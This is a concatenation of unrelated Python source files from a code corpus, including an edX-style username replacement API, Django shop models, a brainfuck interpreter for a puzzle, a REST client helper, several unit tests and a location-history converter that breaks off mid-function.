return Response(str(exc), status=status.HTTP_500_INTERNAL_SERVER_ERROR)
return Response(status=status.HTTP_204_NO_CONTENT)
@staticmethod
def clear_pii_from_userprofile(user):
"""
For the given user, sets all of the user's profile fields to some retired value.
This also deletes all ``SocialLink`` objects associated with this user's profile.
"""
for model_field, value_to_assign in USER_PROFILE_PII.items():
setattr(user.profile, model_field, value_to_assign)
user.profile.save()
user.profile.social_links.all().delete()
@staticmethod
def delete_users_profile_images(user):
set_has_profile_image(user.username, False)
names_of_profile_images = get_profile_image_names(user.username)
remove_profile_images(names_of_profile_images)
@staticmethod
def delete_users_country_cache(user):
cache_key = UserProfile.country_cache_key_name(user.id)
cache.delete(cache_key)
@staticmethod
def retire_users_data_sharing_consent(username, retired_username):
DataSharingConsent.objects.filter(username=username).update(username=retired_username)
@staticmethod
def retire_sapsf_data_transmission(user): # lint-amnesty, pylint: disable=missing-function-docstring
for ent_user in EnterpriseCustomerUser.objects.filter(user_id=user.id):
for enrollment in EnterpriseCourseEnrollment.objects.filter(
enterprise_customer_user=ent_user
):
audits = SapSuccessFactorsLearnerDataTransmissionAudit.objects.filter(
enterprise_course_enrollment_id=enrollment.id
)
audits.update(sapsf_user_id='')
@staticmethod
def retire_degreed_data_transmission(user): # lint-amnesty, pylint: disable=missing-function-docstring
for ent_user in EnterpriseCustomerUser.objects.filter(user_id=user.id):
for enrollment in EnterpriseCourseEnrollment.objects.filter(
enterprise_customer_user=ent_user
):
audits = DegreedLearnerDataTransmissionAudit.objects.filter(
enterprise_course_enrollment_id=enrollment.id
)
audits.update(degreed_user_email='')
@staticmethod
def retire_user_from_pending_enterprise_customer_user(user, retired_email):
PendingEnterpriseCustomerUser.objects.filter(user_email=user.email).update(user_email=retired_email)
@staticmethod
def retire_entitlement_support_detail(user):
"""
Updates all CourseEntitleSupportDetail records for the given
user to have an empty ``comments`` field.
"""
for entitlement in CourseEntitlement.objects.filter(user_id=user.id):
entitlement.courseentitlementsupportdetail_set.all().update(comments='')
class UsernameReplacementView(APIView):
"""
WARNING: This API is only meant to be used as part of a larger job that
updates usernames across all services. DO NOT run this alone or users will
not match across the system and things will be broken.
API will receive a list of current usernames and their requested new
username. If their new username is taken, it will randomly assign a new username.
This API will be called first, before calling the APIs in other services as this
one handles the checks on the usernames provided.
"""
authentication_classes = (JwtAuthentication, )
permission_classes = (permissions.IsAuthenticated, CanReplaceUsername)
def post(self, request):
"""
POST /api/user/v1/accounts/replace_usernames/
```
{
"username_mappings": [
{"current_username_1": "desired_username_1"},
{"current_username_2": "desired_username_2"}
]
}
```
**POST Parameters**
A POST request must include the following parameter.
* username_mappings: Required. A list of objects that map the current username (key)
to the desired username (value)
**POST Response Values**
As long as data validation passes, the request will return a 200 with a new mapping
of old usernames (key) to new username (value)
```
{
"successful_replacements": [
{"old_username_1": "new_username_1"}
],
"failed_replacements": [
{"old_username_2": "new_username_2"}
]
}
```
"""
# (model_name, column_name)
MODELS_WITH_USERNAME = (
('auth.user', 'username'),
('consent.DataSharingConsent', 'username'),
('consent.HistoricalDataSharingConsent', 'username'),
('credit.CreditEligibility', 'username'),
('credit.CreditRequest', 'username'),
('credit.CreditRequirementStatus', 'username'),
('user_api.UserRetirementPartnerReportingStatus', 'original_username'),
('user_api.UserRetirementStatus', 'original_username')
)
UNIQUE_SUFFIX_LENGTH = getattr(settings, 'SOCIAL_AUTH_UUID_LENGTH', 4)
username_mappings = request.data.get("username_mappings")
replacement_locations = self._load_models(MODELS_WITH_USERNAME)
if not self._has_valid_schema(username_mappings):
raise ValidationError("Request data does not match schema")
successful_replacements, failed_replacements = [], []
for username_pair in username_mappings:
current_username = list(username_pair.keys())[0]
desired_username = list(username_pair.values())[0]
new_username = self._generate_unique_username(desired_username, suffix_length=UNIQUE_SUFFIX_LENGTH)
successfully_replaced = self._replace_username_for_all_models(
current_username,
new_username,
replacement_locations
)
if successfully_replaced:
successful_replacements.append({current_username: new_username})
else:
failed_replacements.append({current_username: new_username})
return Response(
status=status.HTTP_200_OK,
data={
"successful_replacements": successful_replacements,
"failed_replacements": failed_replacements
}
)
def _load_models(self, models_with_fields):
""" Takes tuples that contain a model path and returns the list with a loaded version of the model """
try:
replacement_locations = [(apps.get_model(model), column) for (model, column) in models_with_fields]
except LookupError:
log.exception("Unable to load models for username replacement")
raise
return replacement_locations
def _has_valid_schema(self, post_data):
""" Verifies the data is a list of objects with a single key:value pair """
if not isinstance(post_data, list):
return False
for obj in post_data:
if not (isinstance(obj, dict) and len(obj) == 1):
return False
return True
def _generate_unique_username(self, desired_username, suffix_length=4):
"""
Generates a unique username.
If the desired username is available, that will be returned.
Otherwise it will generate unique suffixes to the desired username until it is an available username.
"""
new_username = desired_username
# Keep checking usernames in case desired_username + random suffix is already taken
while True:
if User.objects.filter(username=new_username).exists():
unique_suffix = uuid.uuid4().hex[:suffix_length]
new_username = desired_username + unique_suffix
else:
break
return new_username
def _replace_username_for_all_models(self, current_username, new_username, replacement_locations):
"""
Replaces current_username with new_username for all (model, column) pairs in replacement locations.
Returns if it was successful or not. Will return successful even if no matching
TODO: Determine if logs of username are a PII issue.
"""
try:
with transaction.atomic():
num_rows_changed = 0
for (model, column) in replacement_locations:
num_rows_changed += model.objects.filter(
**{column: current_username}
).update(
**{column: new_username}
)
except Exception as exc: # pylint: disable=broad-except
log.exception(
"Unable to change username from %s to %s. Failed on table %s because %s",
current_username,
new_username,
model.__class__.__name__, # Retrieves the model name that it failed on
exc
)
return False
if num_rows_changed == 0:
log.info(
"Unable to change username from %s to %s because %s doesn't exist.",
current_username,
new_username,
current_username,
)
else:
log.info(
"Successfully changed username from %s to %s.",
current_username,
new_username,
)
return True
| StarcoderdataPython |
127602 | # Copyright (c) 2020 BlenderNPR and contributors. MIT license.
import math
#Rotated Grid Super Sampling pattern
def get_RGSS_samples(grid_size):
samples = []
for x in range(0, grid_size):
for y in range(0, grid_size):
_x = (x / grid_size) * 2.0 - 1.0 #(-1 ... +1 range)
_y = (y / grid_size) * 2.0 - 1.0 #(-1 ... +1 range)
angle = math.atan(1/2)
sin = math.sin(angle)
cos = math.cos(angle)
r_x = _x * cos - _y * sin
r_y = _x * sin + _y * cos
scale = math.sqrt(5)/2
r_x *= scale
samples.append((r_x,r_y))
#TODO: Reorder
return samples
| StarcoderdataPython |
108138 | <reponame>ysenarath/opinion-lab
COMMAND_HELP = '''
oplab <command> [<args>]
'''
TRAIN_COMMAND_HELP = '''
oplab t|train
--params <params_file_path>
--output <model_save_path>
'''
| StarcoderdataPython |
3284865 | <gh_stars>1-10
#!/usr/bin/env python3
import os, sys, signal, itertools
chungus = open("chungus.txt").read()
chars = ('chunga', 'chunky', 'karen', 'big', 'fudd', 'chungus', 'ricardo')
def replace(A, B, C):
for x, y in zip(B, C):
A = A.replace(x, y)
return A
def signal_handler(signum, frame):
raise Exception("timeout")
signal.signal(signal.SIGALRM, signal_handler)
for counter, p in enumerate(itertools.permutations(chars)):
if not (counter + 1) % 100:
print("\n", counter + 1)
else:
print(".", end="")
sys.stdout.flush()
bf = replace(chungus, p, "+-><.[]")
output = ""
pos = 0 # Instruction
array = {0:0} # Cells
current = 0 # Current cell, incremented with '>' and decremented with '<'
signal.alarm(2) # Timeout of 2 seconds
try:
while pos < len(bf):
# Current instruction
inst = bf[pos]
# Increment pointer
if inst == "+":
if current not in array:
array[current] = 1
else:
array[current] += 1
array[current] %= 256 # Wrap around the ASCII table
# Decrement pointer
elif inst == "-":
if current not in array:
array[current] = -1
else:
array[current] -= 1
array[current] %= 256 # Wrap around the ASCII table
# Next cell
elif inst == ">":
current += 1
if current not in array:
array[current] = 0
# Previous cell
elif inst == "<":
current -= 1
if current not in array:
array[current] = 0
# Output ASCII character of cell value
elif inst == ".":
#sys.stdout.write(chr(array[current]))
output += chr(array[current])
# Start loop
elif inst == "[":
if array[current] == 0:
loops = 1
while loops:
pos += 1
if bf[pos] == "[":
loops += 1
elif bf[pos] == "]":
loops -= 1
# End loop
elif inst == "]":
loops = 1
while loops:
pos -= 1
if bf[pos] == "[":
loops -= 1
elif bf[pos] == "]":
loops += 1
pos -= 1
pos += 1
if "HackTrinity" in output:
exit("\n" + output)
except Exception:
signal.alarm(0) # Reset timeout
except NameError:
pass
| StarcoderdataPython |
3257971 | from maggma.api import query_operator
from emmet.api.routes.dielectric.query_operators import DielectricQuery
from monty.tempfile import ScratchDir
from monty.serialization import loadfn, dumpfn
def test_dielectric_query_operator():
op = DielectricQuery()
q = op.query(
e_total_min=0,
e_total_max=5,
e_electronic_min=0,
e_electronic_max=5,
e_ionic_min=0,
e_ionic_max=5,
n_min=0,
n_max=5,
)
fields = [
"e_total",
"e_ionic",
"e_electronic",
"n",
]
assert q == {"criteria": {field: {"$gte": 0, "$lte": 5} for field in fields}}
with ScratchDir("."):
dumpfn(op, "temp.json")
new_op = loadfn("temp.json")
q = new_op.query(
e_total_min=0,
e_total_max=5,
e_electronic_min=0,
e_electronic_max=5,
e_ionic_min=0,
e_ionic_max=5,
n_min=0,
n_max=5,
)
assert dict(q) == {
"criteria": {field: {"$gte": 0, "$lte": 5} for field in fields}
}
| StarcoderdataPython |
3371707 | from django.db import models
# Create your models here.
class Product(models.Model):
# TODO: creating fulldesc and short desc
product_no = models.IntegerField(default=1)
product_name = models.CharField(max_length=50)
category = models.CharField(max_length=50, default="")
sub_category = models.CharField(max_length=50, default="")
product_desc = models.CharField(max_length=300)
price = models.IntegerField(default=0)
pub_date = models.DateTimeField()
product_image = models.ImageField(upload_to="shop/img", default="")
def __str__(self):
return self.product_name
class Contact(models.Model):
name = models.CharField(max_length=50)
email = models.CharField(max_length=70)
phone = models.IntegerField()
desc = models.TextField(max_length=700)
pub_date = models.DateTimeField()
def __str__(self):
return self.name
class Order(models.Model):
itemsJson = models.CharField(max_length=100000)
customerName = models.CharField(max_length=100)
customerEmail = models.CharField(max_length=200)
customerPhone = models.IntegerField()
customerAddress = models.CharField(max_length=400)
customerCity = models.CharField(max_length=100)
customerState = models.CharField(max_length=100)
customerZipCode = models.CharField(max_length=10)
orderDate = models.DateTimeField()
payment_id = models.CharField(default="", max_length=1000)
payment_status = models.BooleanField(default=False)
amount = models.IntegerField(default=0)
def __str__(self):
return self.customerName
class OrderUpdate(models.Model):
order_id = models.IntegerField(default="")
orderUpdateDesc = models.CharField(max_length=5000, default="")
updateTimeStamp = models.DateTimeField()
def __str__(self):
return self.orderUpdateDesc[:10] + "..." | StarcoderdataPython |
7216 | import io
from PIL import Image as PILImage
from sqlalchemy import Column, ForeignKey, LargeBinary, Index, Integer, String
from resources.models.ModelBase import Base
class Image(Base):
# If this is used then the image is stored in the database
image = Column(LargeBinary(length=16777215), default=None)
# If this is used then the image is remote and this is the url
url = Column(String(500))
caption = Column(String(100))
# This is a PhotoHash of the image for assistance in deduping
signature = Column(String(50))
artistId = Column(Integer, ForeignKey("artist.id"), index=True)
releaseId = Column(Integer, ForeignKey("release.id"), index=True)
def averageHash(self):
try:
hash_size = 8
# Open the image, resize it and convert it to black & white.
image = PILImage.open(io.BytesIO(self.image)).resize((hash_size, hash_size), PILImage.ANTIALIAS).convert(
'L')
pixels = list(image.getdata())
# Compute the hash based on each pixels value compared to the average.
avg = sum(pixels) / len(pixels)
bits = "".join(map(lambda pixel: '1' if pixel > avg else '0', pixels))
hashformat = "0{hashlength}x".format(hashlength=hash_size ** 2 // 4)
return int(bits, 2).__format__(hashformat)
except:
return None
def __unicode__(self):
return self.caption
def __str__(self):
return self.caption or self.signature
| StarcoderdataPython |
3314421 | <filename>lyrics/chartlyrics.py<gh_stars>1-10
"""
chartlyrics
Gets the lyrics for a song using the chartlyrics website
@category silly
@version $ID: 1.1.1, 2015-06-30 17:00:00 CST $;
@author KMR
@licence GNU GPL v.3
"""
__version__ = "1.1.1"
import requests
from bs4 import BeautifulSoup
class chartlyrics:
config = None
def __init__(self, conf):
self.config = conf
print "chartlyrics initialised successfully"
def getLyrics(self, artist, song):
# build a payload for the get params
payload = {'artist': artist, 'song': song}
# request the xml
r = requests.get(self.config['url'], params=payload)
# make it into a soup
soup = BeautifulSoup(r.text, "xml")
# get the bit we actually want
lyrics = soup.GetLyricResult.Lyric.text | StarcoderdataPython |
1625583 | <filename>test/matrix/test_named_matrix.py
import unittest
import collections
import time
import bspump
import bspump.matrix
import bspump.unittest
class TestNamedMatrix(bspump.unittest.TestCase):
def test_matrix_zeros(self):
matrix = bspump.matrix.NamedMatrix(
app = self.App,
dtype = "int_")
matrix.zeros()
self.assertEqual(matrix.Array.shape, (0,))
self.assertEqual(len(matrix.N2IMap), 0)
self.assertEqual(len(matrix.I2NMap), 0)
def test_matrix_flush(self):
matrix = bspump.matrix.NamedMatrix(app=self.App)
n = 100
indexes = []
for i in range(n):
index = matrix.add_row(str(i))
indexes.append(index)
matrix.Array[index] = i
check_array = matrix.Array[40:100]
for i in range(0, 40):
matrix.close_row(i)
matrix.flush()
self.assertEqual(matrix.Array.shape, (n - 40,))
self.assertEqual(len(matrix.N2IMap), n - 40)
self.assertEqual(len(matrix.I2NMap), n - 40)
self.assertEqual(len(check_array), len(matrix.Array))
for i in range(len(check_array)):
self.assertEqual(check_array[i], matrix.Array[i])
def test_matrix_add_row(self):
matrix = bspump.matrix.NamedMatrix(app=self.App)
n = 100
n2i = collections.OrderedDict()
i2n = collections.OrderedDict()
for i in range(n):
name = "id_" + str(i)
index = matrix.add_row(name)
n2i[name] = index
i2n[index] = name
self.assertEqual(n2i, matrix.N2IMap)
self.assertEqual(i2n, matrix.I2NMap)
def test_matrix_close_row(self):
matrix = bspump.matrix.NamedMatrix(app=self.App)
n = 100
for i in range(n):
index = matrix.add_row(str(i))
for i in range(0, 5):
matrix.close_row(i)
self.assertNotIn(i, matrix.I2NMap)
self.assertEqual(len(matrix.I2NMap), len(matrix.N2IMap))
def test_matrix_get_row_index(self):
matrix = bspump.matrix.NamedMatrix(app=self.App)
n = 100
for i in range(n):
name = "id_" + str(i)
index = matrix.add_row(name)
index_obtained = matrix.get_row_index(name)
self.assertEqual(i, index_obtained)
def test_matrix_get_row_name(self):
matrix = bspump.matrix.NamedMatrix(app=self.App)
n = 100
for i in range(n):
name = "id_" + str(i)
index = matrix.add_row(name)
name_obtained = matrix.get_row_name(i)
self.assertEqual(name, name_obtained)
| StarcoderdataPython |
3274350 | #!/usr/bin/env python
from setuptools import setup
import os
package_name = 'fht'
files_so = [t for t in os.listdir(package_name) if t.endswith('.so')]
print(files_so)
setup(name='fht',
version='0.1',
description='fast hankel transform',
author='<NAME>',
author_email='<EMAIL>',
license='MIT',
packages=['fht'],
package_dir={'': '.'},
package_data={'': files_so},
install_requires=[
'scipy',
'numpy',
'matplotlib',
],
zip_safe=False)
| StarcoderdataPython |
3212126 | # -*- coding: utf-8 -*-
from django.views.generic import ListView
from .models import Post
class PostListView(ListView):
model = Post
| StarcoderdataPython |
3227362 | import spya
from os import path as op
def test_paths():
path = spya.paths('.', 'tests')
assert path == '.' + op.sep + 'tests'
def test_exists():
assert True == spya.exists(__file__)
def test_isfile():
assert True == spya.isfile(__file__)
def test_isdir():
dirname = spya.dirname(__file__)
assert True == spya.isdir(dirname)
def test_dirname():
dirname = op.dirname(__file__)
assert dirname == spya.dirname(__file__)
def test_basename():
assert 'test___init__.py' == spya.basename(__file__)
def test_filename():
assert 'test___init__' == spya.filename(__file__)
def test_extension():
assert '.py' == spya.extension(__file__)
def test_getsize():
assert spya.getsize(__file__) is not None
| StarcoderdataPython |
77408 | import os
import glob
import requests
import warnings
import jsonpatch
from jinja2 import Environment
from spytest.dicts import SpyTestDict
from utilities import common as utils
from utilities import json_helpers as json
class Rest(object):
def __init__(self, logger=None):
self.base_url = os.getenv("SPYTEST_REST_TEST_URL")
self.session = None
self.logger = logger
self.timeout = 1
self.protocol = "https"
self.ip = None
self.username = None
self.password = None
self.altpassword = None
self.curr_pwd = None
self.cli_data = SpyTestDict()
def reinit(self, ip, username, password, altpassword):
self.ip = ip
self.base_url = "{}://{}".format(self.protocol, ip)
try:
self._set_auth(username, password, altpassword)
except:
pass
return self
def reset_curr_pwd(self):
self.curr_pwd = None
def _set_auth(self, username, password, altpassword):
self.username = username
if not self.curr_pwd:
if password and altpassword:
self.password = password
self.altpassword = altpassword
for pwd in [password, altpassword]:
tmp_session = self._get_session()
tmp_session.auth = (self.username, pwd)
tmp_session.verify = False
tmp_url = self._get_url("/restconf/data/openconfig-system:system")
iter_count = 3
while iter_count > 0:
iter_count -= 1
try:
retval = tmp_session.get(tmp_url, verify=False, timeout=self.timeout)
self._log("Using '{}' '{}' : '{}'".format(username, pwd, retval.status_code))
if retval.status_code == 200:
self.curr_pwd = pwd
break
except Exception as e:
self._log("Exception '{}' '{}' : '{}'".format(username, pwd, e))
if self.curr_pwd:
break
elif password:
self.password = password
self.curr_pwd = password
elif altpassword:
self.altpassword = altpassword
self.curr_pwd = <PASSWORD>
msg = "Rest details '{}' '{}' '{}' '{}' '{}'".format(
self.ip, self.username, self.password, self.altpassword, self.curr_pwd)
self._log(msg)
def _create_session(self):
self.session = requests.session()
self.headers = {"Accept": "application/yang-data+json",
"Content-type": "application/yang-data+json"}
self.session.headers.update(self.headers)
if self.curr_pwd:
self.session.auth = (self.username, self.curr_pwd)
self.session.verify = False
warnings.filterwarnings('ignore', message='Unverified HTTPS request')
def _get_credentials(self):
return [self.username, self.curr_pwd]
def _get_session(self):
self._create_session()
if not self.session:
self._create_session()
return self.session
def _log(self, msg):
if self.logger:
self.logger.debug(msg)
else:
print(msg)
def _dump(self, data):
self._log(json.dumps(data))
def _get_url(self, path, *args, **kwargs):
params = []
for key, value in kwargs.items():
if value:
value = value.replace(" ", "%20")
params.append('{}={}'.format(key, value))
else:
params.append(key)
if path.startswith("/"):
path = path[1:]
if params:
url = "{}/{}/{}".format(self.base_url, path, ",".join(params))
else:
url = "{}/{}".format(self.base_url, path)
for entry in args:
url = "{}/{}".format(url, entry)
return url
def _json(self, retval, default={}):
try:
return retval.json()
except Exception as exp:
print(utils.stack_trace(exp))
return default
def _result(self, operation, retval, inp):
resp = SpyTestDict()
resp.url = retval.url
resp.operation = operation
resp.status = retval.status_code
resp.input = inp
resp.output = self._json(retval)
self._log(json.dumps(resp))
return resp
def post(self, path, data, *args, **kwargs):
session = self._get_session()
try:
url = self._get_url(path, *args, **kwargs)
retval = session.post(url, json.dumps(data), verify=False, timeout=self.timeout)
return self._result("POST", retval, data)
except Exception as e:
print(e)
raise e
def put(self, path, data, *args, **kwargs):
session = self._get_session()
try:
url = self._get_url(path, *args, **kwargs)
retval = session.put(url, json.dumps(data), verify=False, timeout=self.timeout)
return self._result("PUT", retval, data)
except Exception as e:
print(e)
raise e
def patch(self, path, data, *args, **kwargs):
session = self._get_session()
try:
url = self._get_url(path, *args, **kwargs)
retval = session.patch(url, json.dumps(data), verify=False, timeout=self.timeout)
return self._result("PATCH", retval, data)
except Exception as e:
print(e)
raise e
def delete(self, path, *args, **kwargs):
session = self._get_session()
try:
url = self._get_url(path, *args, **kwargs)
retval = session.delete(url, verify=False, timeout=self.timeout)
return self._result("DELETE", retval, None)
except Exception as e:
print(e)
raise e
def get(self, path, *args, **kwargs):
session = self._get_session()
try:
url = self._get_url(path, *args, **kwargs)
retval = session.get(url, verify=False, timeout=self.timeout)
return self._result("GET", retval, None)
except Exception as e:
print(utils.stack_trace(e))
raise e
def parse(self, filepath=None, all_sections=False, paths=[], **kwargs):
assert filepath, "File Path must be provided"
root = None
if "::" in filepath: [filepath, root] = filepath.split("::", 2)
if not isinstance(paths, list) and isinstance(paths, str):
paths = [paths]
filepath = utils.find_file(filepath, paths)
text = "\n".join(utils.read_lines(filepath))
tmpl = Environment().from_string(text)
if root:
block = tmpl.blocks[root]
text = "\n".join(block(tmpl.new_context(kwargs)))
return json.fix(text, "Invalid json file supplied", True, object_pairs_hook=SpyTestDict)
if not all_sections or not tmpl.blocks:
text = Environment().from_string(text).render(**kwargs)
return json.fix(text, "Invalid json file supplied", True, object_pairs_hook=SpyTestDict)
retval = SpyTestDict()
for root in tmpl.blocks:
block = tmpl.blocks[root]
text = "\n".join(block(tmpl.new_context(**kwargs)))
retval[root] = json.fix(text, "Invalid json file supplied", True, object_pairs_hook=SpyTestDict)
return retval
def load_cli(self, filepath):
self.cli_data = self.parse(filepath)
for req_list in self.cli_data.values():
for req in req_list:
for key, cli in req.items():
print("{} -- {} -- {}".format(cli.view, cli.cmd, key))
def search_cli(self, key):
for req_list in self.cli_data.values():
for req in req_list:
if key in req:
return req[key]
return None
def search_cli_data(self, data):
print(json.dumps(data))
def cli(self, request, sections=None, operations=None):
retval = SpyTestDict()
map_operations={"create":"post", "read":"get", "update":"put", "modify":"patch", "delete":"delete"}
if operations: operations = utils.make_list(operations)
for index, ent in enumerate(utils.make_list(request)):
key = ent.path.replace("/restconf/data", map_operations[ent.operation])
key = key.replace("-", "_").replace(":", "_").replace("/", "_")
cli = self.search_cli(key)
if not cli:
print("Rest2CLI Fail: {} {}".format(key, ent.path))
self.search_cli_data(request.data)
continue
print("Rest2CLI PASS: {} {}".format(key, cli.cmd))
return retval
def apply(self, request, sections=None, operations=None, ui="rest"):
if ui == "cli": return self.cli(request, sections, operations)
retval = SpyTestDict()
if operations: operations = utils.make_list(operations)
for index, ent in enumerate(utils.make_list(request)):
enable = ent.get("enable", 1)
if not enable: continue
operation = ent["operation"]
if operations and operation not in operations: continue
instance = ent.get("instance", dict())
data = ent.get("data", dict())
path = ent.get("path", "")
name = ent.get("name", "{}".format(index))
if operation == "read" or operation == "get":
retval[name] = self.get(path, **instance)
elif operation == "configure" or operation == "patch":
retval[name] = self.patch(path, data, **instance)
elif operation == "unconfigure" or operation == "delete":
retval[name] = self.delete(path, **instance)
elif operation == "post":
retval[name] = self.post(path, data, **instance)
elif operation == "put":
retval[name] = self.put(path, data, **instance)
elif operation == "verify":
resp = self.get(path, **instance)
result = [True, []]
for pe in jsonpatch.make_patch(data, resp.output):
result[1].append(pe)
if pe["op"] != "add":
result[0] = False
retval[name] = result
return retval
if __name__ == "__main__":
def _main():
r = Rest().reinit("10.52.129.47", "admin", "broadcom", "broadcom2")
r.load_cli('../datastore/samples/all.cli')
for filepath in glob.glob('../datastore/samples/*.j2'):
#if "openconfig-system.j2" not in filepath: continue
msg = "Rest {}".format(filepath)
utils.banner(msg, tnl=False)
d = r.parse(filepath, all_sections=True)
for name, section in d.items():
if section.operation == "read": continue
msg = "{}::{} {}".format(filepath, name, section.operation)
utils.banner(msg, tnl=False)
r.apply(section, ui="rest")
break
def _main2():
r = Rest().reinit("10.59.143.100", "admin", "broadcom", "broadcom2")
url = "/restconf/data/openconfig-interfaces:interfaces"
print(r.get(url, "openconfig-vxlan:vxlan-if", interface="vtep1"))
_main2()
| StarcoderdataPython |
1649786 | <filename>ciukune/core/settings/database.py<gh_stars>0
"""Database settings, can be overrided in production."""
from os.path import join
from os.path import dirname
from os.path import abspath
BASE_DIR = dirname(dirname(abspath(__file__)))
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': join(BASE_DIR, 'db.sqlite3'),
}
}
| StarcoderdataPython |
5424 | <reponame>DavideRuzza/moderngl-window
"""
Registry general data files
"""
from typing import Any
from moderngl_window.resources.base import BaseRegistry
from moderngl_window.meta import DataDescription
class DataFiles(BaseRegistry):
"""Registry for requested data files"""
settings_attr = "DATA_LOADERS"
def load(self, meta: DataDescription) -> Any:
"""Load data file with the configured loaders.
Args:
meta (:py:class:`~moderngl_window.meta.data.DataDescription`): the resource description
Returns:
Any: The loaded resource
"""
return super().load(meta)
data = DataFiles()
| StarcoderdataPython |
3231934 | from duty.objects import dp, Event
from duty.utils import ment_user, format_response
from microvk import VkApiResponseException
def user_add(event: Event, typ: str):
user = event.api('users.get', user_ids=event.obj['user_id'])[0]
def _format(response_name, err=None):
return format_response(
event.responses[response_name],
ссылка=ment_user(user), имя=event.chat.name, ошибка=err
)
if event.obj['user_id'] == event.db.owner_id:
event.send(_format('user_ret_self'))
return 'ok'
message_id = event.send(_format(typ))
try:
event.api('messages.removeChatUser',
chat_id=event.chat.id, user_id=user['id'])
except VkApiResponseException:
pass
try:
event.api('messages.addChatUser',
chat_id=event.chat.id, user_id=user['id'])
event.edit_msg(message_id, _format('user_ret_success'))
return "ok"
except VkApiResponseException as e:
if e.error_code == 15:
event.edit_msg(message_id, _format('user_ret_err_no_access'))
else:
event.edit_msg(message_id, _format('user_ret_err_vk', e.error_msg))
return {
"response":"vk_error",
"error_code": e.error_code,
"error_message": e.error_msg
}
except Exception:
event.edit_msg(message_id, _format('user_ret_err_unknown'))
return {"response":"error","error_code":"0","error_message":""}
@dp.event_register('addUser')
def add_user(event: Event) -> str:
return user_add(event, 'user_ret_process')
@dp.event_register('banExpired')
def ban_expired(event: Event) -> str:
return user_add(event, 'user_ret_ban_expired')
| StarcoderdataPython |
4819476 | <reponame>qsnake/h5py
from h5py import tests
from h5py import *
class TestCreate(tests.HTest):
def setUp(self):
self.fid, self.name = tests.gettemp()
def tearDown(self):
import os
self.fid.close()
os.unlink(self.name)
@tests.require(api=18)
def test_create_anon(self):
""" (H5G) Anonymous group creation """
gid = h5g.create(self.fid, None)
self.assert_(gid)
self.assertIsInstance(gid, h5g.GroupID)
| StarcoderdataPython |
3298788 | <gh_stars>1-10
#!/usr/bin/env python
# Copyright 2012-2017 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import division
import sys
import json
import math
from argparse import ArgumentParser, ArgumentTypeError
from datetime import datetime
def valid_date(s):
try:
return datetime.strptime(s, "%Y-%m-%d")
except ValueError:
msg = "Not a valid date: '{0}'.".format(s)
raise ArgumentTypeError(msg)
def dateCheck(timestampms, startdate, enddate):
dt = datetime.utcfromtimestamp(int(timestampms) / 1000)
if startdate and startdate > dt : return False
if enddate and enddate < dt : return False
return True
def main():
arg_parser = ArgumentParser()
arg_parser.add_argument("input", help="Input File (JSON)")
arg_parser.add_argument("-o", "--output", help="Output File (will be overwritten!)")
arg_parser.add_argument("-f", "--format", choices=["kml", "json", "csv", "js", "gpx", "gpxtracks"], default="kml", help="Format of the output")
arg_parser.add_argument("-v", "--variable", default="locationJsonData", help="Variable name to be used for js output")
arg_parser.add_argument('-s', "--startdate", help="The Start Date - format YYYY-MM-DD (0h00)", type=valid_date)
arg_parser.add_argument('-e', "--enddate", help="The End Date - format YYYY-MM-DD (0h00)", type=valid_date)
arg_parser.add_argument('-c', "--chronological", help="Sort items in chronological order", action="store_true")
args = arg_parser.parse_args()
if not args.output: #if the output file is not specified, set to input filename with a diffrent extension
args.output = '.'.join(args.input.split('.')[:-1]) + '.' + args.format
if args.input == args.output:
arg_parser.error("Input and output have to be different files")
return
try:
json_data = open(args.input).read()
except:
print("Error opening input file")
return
try:
data = json.loads(json_data)
except:
print("Error decoding json")
return
if "locations" in data and len(data["locations"]) > 0:
try:
f_out = open(args.output, "w")
except:
print("Error creating output file for writing")
return
items = data["locations"]
if args.startdate or args.enddate:
items = [ item for item in items if dateCheck(item["timestampMs"], args.startdate, args.enddate) ]
if args.chronological:
items = sorted(items, key=lambda item: item["timestampMs"])
if args.format == "json" or args.format == "js":
if args.format == "js":
f_out.write("window.%s = " % args.variable)
f_out.write("{\"locations\":[")
first = True
for item in items:
if first:
first = False
else:
f_out.write(",")
f_out.write("{")
f_out.write("\"timestampMs\":%s," % item["timestampMs"])
f_out.write("\"latitudeE7\":%s," % item["latitudeE7"])
f_out.write("\"longitudeE7\":%s" % item["longitudeE7"])
f_out.write("}")
f_out.write("]}")
if args.format == "js":
f_out.write(";")
if args.format == "csv":
f_out.write("Time,Latitude,Longitude\n")
for item in items:
f_out.write(datetime.utcfromtimestamp(int(item["timestampMs"]) / 1000).strftime("%Y-%m-%d %H:%M:%S"))
f_out.write(",")
f_out.write("%s,%s\n" % (item["latitudeE7"] / 10000000, item["longitudeE7"] / 10000000))
if args.format == "kml":
f_out.write("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n")
f_out.write("<kml xmlns=\"http://www.opengis.net/kml/2.2\">\n")
f_out.write(" <Document>\n")
f_out.write(" <name>Location History</name>\n")
for item in items:
f_out.write(" <Placemark>\n")
# Order of these tags is important to make valid KML: TimeStamp, ExtendedData, then Point
f_out.write(" <TimeStamp><when>")
f_out.write(datetime.utcfromtimestamp(int(item["timestampMs"]) / 1000).strftime("%Y-%m-%dT%H:%M:%SZ"))
f_out.write("</when></TimeStamp>\n")
if "accuracy" in item or "speed" in item or "altitude" in item:
f_out.write(" <ExtendedData>\n")
if "accuracy" in item:
f_out.write(" <Data name=\"accuracy\">\n")
f_out.write(" <value>%d</value>\n" % item["accuracy"])
f_out.write(" </Data>\n")
if "speed" in item:
f_out.write(" <Data name=\"speed\">\n")
f_out.write(" <value>%d</value>\n" % item["speed"])
f_out.write(" </Data>\n")
if "altitude" in item:
f_out.write(" <Data name=\"altitude\">\n")
f_out.write(" <value>%d</value>\n" % item["altitude"])
f_out.write(" </Data>\n")
f_out.write(" </ExtendedData>\n")
f_out.write(" <Point><coordinates>%s,%s</coordinates></Point>\n" % (item["longitudeE7"] / 10000000, item["latitudeE7"] / 10000000))
f_out.write(" </Placemark>\n")
f_out.write(" </Document>\n</kml>\n")
if args.format == "gpx" or args.format == "gpxtracks":
f_out.write("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n")
